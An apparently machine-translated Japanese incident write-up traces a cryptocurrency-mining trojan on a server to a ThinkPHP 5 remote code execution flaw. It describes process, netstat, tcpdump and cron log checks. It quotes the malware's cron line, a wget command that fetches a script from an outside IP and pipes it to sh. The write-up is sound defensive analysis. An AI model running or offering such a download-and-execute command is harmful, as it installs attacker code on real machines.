/tmp/php -s /tmp/p2.conf基本的にハングしていることは確実です次のステップはソースを特定することです
last ログイン レコードがありません最初にこれらのプロセスを強制終了しますが、数分後に再び表示されます内容を見てみましょうこのトロイの木馬が最初に実行したいことは、netstat このトロイの木馬がポートを開いて、海外の特定の IP との接続を確立したことを参照してくださいしかし、tcpdump はしばらくデータ転送を検出できませんでした彼は何がしたかったのですか? ログの確認を続けますcron ログで、www ユーザーが crontab タイミング操作を行っていることがわかりました。これが基本的に問題です
wget -q -O - http://83.220.169.247/cr3.sh | sh > /dev/null 2>&1いくつかの問題をダウンロードしましたこれはマイニング トロイの木馬プログラムのようですサーバー上の www ユーザーは、lnmp をインストールすることによって作成されました。ソースを見ると、おそらく Web の脆弱性です。 /tmp の下にある php の権限を確認してください。www lnmp の下にあるいくつかのサイトのログを確認すると、thinkphp 5
で最近明らかになったリモート コード実行の脆弱性が使用されていることがわかります。
脆弱性の詳細: https://nosec.org/home/detail/2050.html問題を修正して解決してくださいただし、このサイトはテスト サイトであり、ポートがリッスンしています。は 8083 です。ハッカーが今、型破りなポートを盗聴し始められるでしょうか? 出典: https://www.simapple.com/425.html
